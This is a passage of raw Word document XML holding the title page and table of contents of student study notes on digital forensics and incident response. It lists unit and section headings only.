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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">L J INSTITUTE OF COMPUTER APPLICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Master of Computer Applications (MCA) — Semester III</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">DIGITAL FORENSICS &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">INCIDENT RESPONSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Student Study Notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="900"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Covers Units I – V + Lab Practical Companion  ·  Based on the Official LJ University Syllabus (Batch 2025)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for exam preparation and quick revision</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:top="1080" w:right="1080" w:bottom="1080" w:left="1080" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit I — Foundations of Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 What Is Digital Forensics?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Scope and Types of Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Goals of a Forensic Investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Digital Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 Locard’s Exchange Principle in the Digital World</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.6 The Digital Forensics Investigation Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7 Chain of Custody</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.8 Legal and Ethical Aspects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.9 Investigator Roles, Responsibilities and Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.10 Common Pitfalls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.11 Forensic Operating Systems — CAINE and SIFT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit II — Evidence Acquisition &amp; Data Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Volatile vs Non-Volatile Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Order of Volatility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Live vs Dead Acquisition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Write Blockers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 Forensic Imaging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6 Hash Verification and Evidence Integrity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7 Chain of Custody During Imaging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.8 Deleted File Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.9 Slack Space, Unallocated Space and Swap Space</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.10 Password Recovery and Bypass — Overview (Ethical Context)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.11 RAM / Memory Acquisition Basics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.12 Evidence Storage and Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit III — Windows &amp; Linux Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Windows File System Internals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Windows Registry Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Browser Artefacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Other Windows Artefacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 Timeline Analysis with log2timeline / Plaso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7 Linux Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8 Forensic Tool Overview — Autopsy, Sleuth Kit and FTK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9 Hands-On Case Scenario Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit IV — Network, Email, Cloud &amp; Mobile Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Network Forensics Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Packet Capture Analysis with Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 NetFlow and Traffic Flow Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 Firewall, Proxy and IDS Log Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5 Identifying C2 Traffic, Data Exfiltration and Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.6 Email Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.7 Cloud Forensics — Challenges and Conceptual Acquisition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.8 Dark Web — Overview and Challenges for Investigators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.9 Encryption Challenges in Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">4.10 Mobile Forensics — Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit V — Incident Response, Malware Forensics &amp; Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Incident Response — Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 NIST SP 800-61 — The Incident Response Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 How Forensics Integrates with Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 First Responder Responsibilities and Preserving Volatile Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 Malware Forensics — Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.6 Ransomware Case Study</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">5.7 Phishing and Insider-Threat Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
